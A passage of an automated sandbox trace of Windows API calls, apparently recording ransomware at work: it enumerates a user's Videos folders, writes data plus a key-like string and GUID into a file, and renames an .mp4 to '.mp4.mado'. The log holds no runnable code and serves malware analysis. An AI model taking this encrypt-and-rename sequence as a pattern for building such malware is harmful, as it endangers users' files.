(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a40 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66e88 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.129] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0xa031, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0xa031, lpOverlapped=0x0) returned 1 [0206.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0206.129] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa036, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.129] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0206.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.129] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.129] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.129] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.130] CloseHandle (hObject=0x63c) returned 1 [0206.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0206.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0206.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77968 | out: hHeap=0x2c0000) returned 1 [0206.131] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\8m9Bz3FPoME9 jG_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\8m9bz3fpome9 jg_.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\8m9Bz3FPoME9 jG_.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\8m9bz3fpome9 jg_.mp4.mado")) returned 1 [0206.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.133] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.134] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d1900, ftCreationTime.dwHighDateTime=0x1d5d89a, ftLastAccessTime.dwLowDateTime=0xd138da40, ftLastAccessTime.dwHighDateTime=0x1d5dd94, ftLastWriteTime.dwLowDateTime=0xd138da40, ftLastWriteTime.dwHighDateTime=0x1d5dd94, nFileSizeHigh=0x0, nFileSizeLow=0xa036, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8m9Bz3FPoME9 jG_.mp4", cAlternateFileName="8M9BZ3~1.MP4")) returned 0 [0206.134] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0206.135] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0206.135] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0206.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\") returned="pElYZ7RBZiDz1\\" [0206.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\") returned="biDMIzVx5WSAFsePg\\" [0206.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0206.142] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.142] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.143] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.143] PathFindFileNameW (pszPath="") returned="" [0206.143] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85d079c0, ftCreationTime.dwHighDateTime=0x1d5e332, ftLastAccessTime.dwLowDateTime=0xb09ca9b0, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, ftLastWriteTime.dwLowDateTime=0xb09ca9b0, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.145] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85d079c0, ftCreationTime.dwHighDateTime=0x1d5e332, ftLastAccessTime.dwLowDateTime=0xb09ca9b0, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, 